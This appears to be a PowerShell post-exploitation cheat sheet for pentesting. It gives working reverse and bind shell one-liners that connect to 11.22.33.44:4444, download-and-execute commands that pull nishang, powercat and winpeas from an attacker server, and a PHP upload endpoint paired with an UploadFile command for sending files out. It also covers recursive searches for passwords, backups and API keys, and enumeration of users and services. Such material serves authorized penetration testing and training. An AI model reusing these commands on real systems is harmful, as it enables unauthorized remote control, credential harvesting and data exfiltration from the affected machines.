Skip to content

PowerShell

Reverse Shell (1)

Listener (On hacker machine)

nc -nvlp 4444
On target machine
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse Shell (2)

Source of ps1 scripts

sudo git clone https://github.com/samratashok/nishang /opt/nishang
listener (On hacker machine)
nc -nvlp 4444
On target machine**
powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444

Bind Shell

setup listener on windows box

powershell -c "$l = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$l.start();$client = $l.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$l.Stop()"
on kali linux
nc -nv 11.22.33.44 4444

run application

Start-Process notepad.txt

search command

Get-command get-*ip*

list files

Get-Childitem -Path C:\

Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*
Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue

read file

more password.txt
type password.txt
cat password.txt
get-content .\password.txt

present data

get-process | out-gridview
get-hostfix | out-gridview

save into file

get-hotfix | out-file hotfix.txt

copy and move file

copy-item password.txt password_copy.txt
move-item password.txt password_copy.txt

download file

(New-Object System.Net.WebClient).Downloadfile("http://<IP>/shell.exe","shell.exe")

download file, but not save

IEX (New-Object System.Net.WebClient).DownloadString('http://<IP>/hello.ps1')

upload file

**upload.php

<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
(New-Object System.Net.WebClient).UploadFile('http://<ip>/upload.php', 'important.docx')

search by content

Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY

show services

get-service
get-service | where-object -property status -eq running
get-service | where-object -property status -eq stopped
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

current working directory

get-location

check if file exist

test-path c:/program files/interesting-files.txt

get list of users

get-localuser

get list of user with details

get-localuser | select *

get details of user

get-localuser -name Administrator | select *

list local groups

get-localgroup

get IP address

get-netipadresss

get all process

get-process

list scheduled tasks

get-scheduledtask

get owner of

get-acl c:

unzip

Expand-Archive -Path winpeas.zip -DestinationPath .

check .Net version

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP"

file transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/winpeas.bat','C:\Windows\Temp\winpeas.bat')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/powercat.ps1','C:\Windows\Temp\powercat.ps1')"

enumerate patches

get-hotfix
get-hotfix | format-list | findstr InstalledOn